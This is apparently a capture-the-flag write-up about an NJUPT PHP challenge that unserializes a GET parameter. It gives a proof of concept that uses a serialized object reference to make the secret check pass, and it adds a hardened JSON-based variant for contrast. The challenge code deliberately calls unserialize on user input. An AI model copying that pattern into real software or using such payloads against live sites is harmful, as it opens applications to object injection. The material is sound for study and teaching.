The challenge is as follows:
<?php
class just4fun {
    var $enter;
    var $secret;
}

if (isset($_GET['pass'])) {
    $pass = $_GET['pass'];
    // get_magic_quotes_gpc() was removed in PHP 8.0; the challenge targets older PHP.
    if (get_magic_quotes_gpc()) {
        $pass = stripslashes($pass);
    }
    // Attacker-controlled input is deserialized into an object.
    $o = unserialize($pass);
    if ($o) {
        $o->secret = "*";
        if ($o->secret === $o->enter)
            echo "Congratulation! Here is my secret: ".$o->secret;
        else
            echo "Oh no... You can't fool me";
    }
    else echo "are you trolling?";
}
?>
This mainly involves deep versus shallow copying of PHP objects. Article:
Construct the PoC directly:
<?php
class just4fun {
    var $enter;
    var $secret;

    function __construct()
    {
        // Bind $enter to $secret by reference, so both names share one value.
        $this->enter = &$this->secret;
    }
}
echo serialize(new just4fun());
?>
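The following is an added example, not part of the original post: it puts the challenge's comparison next to a hardened variant, showing that the reference binding survives the serialize/unserialize round trip and why a format without references closes the gap. The function names `check_vulnerable` and `check_hardened`, the JSON input format, and the sample secret are assumptions made for illustration.

```php
<?php
// Added illustration; function names, JSON input and sample values are assumptions.
class just4fun {
    public $enter;
    public $secret;
}

// The challenge's comparison, wrapped in a function so it can be called twice.
function check_vulnerable(string $pass): bool {
    $o = unserialize($pass);          // rebuilds PHP references from the input
    if (!$o) {
        return false;
    }
    $o->secret = "*";                 // also writes through every alias of $secret
    return $o->secret === $o->enter;
}

// Hardened variant: JSON cannot express references or class instances,
// and the secret is never stored inside the decoded, user-supplied value.
function check_hardened(string $pass, string $serverSecret): bool {
    $data = json_decode($pass, true);
    if (!is_array($data) || !isset($data['enter']) || !is_string($data['enter'])) {
        return false;
    }
    return hash_equals($serverSecret, $data['enter']);  // constant-time compare
}

// Constructed inputs.
$aliased = new just4fun();
$aliased->enter = &$aliased->secret;  // same binding as the PoC constructor
$plain = new just4fun();
$plain->enter = "guess";
$serverSecret = "constructed-secret"; // constructed sample value

// Reference payload versus an ordinary value against the original check.
var_dump(check_vulnerable(serialize($aliased)));
var_dump(check_vulnerable(serialize($plain)));

// Wrong guess versus the correct secret against the hardened check.
var_dump(check_hardened(json_encode(['enter' => 'guess']), $serverSecret));
var_dump(check_hardened(json_encode(['enter' => $serverSecret]), $serverSecret));
```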
NJUPT (Nanjing University of Posts and Telecommunications) PHP deserialization
Original URL: https://www.cnblogs.com/nul1/p/9417484.html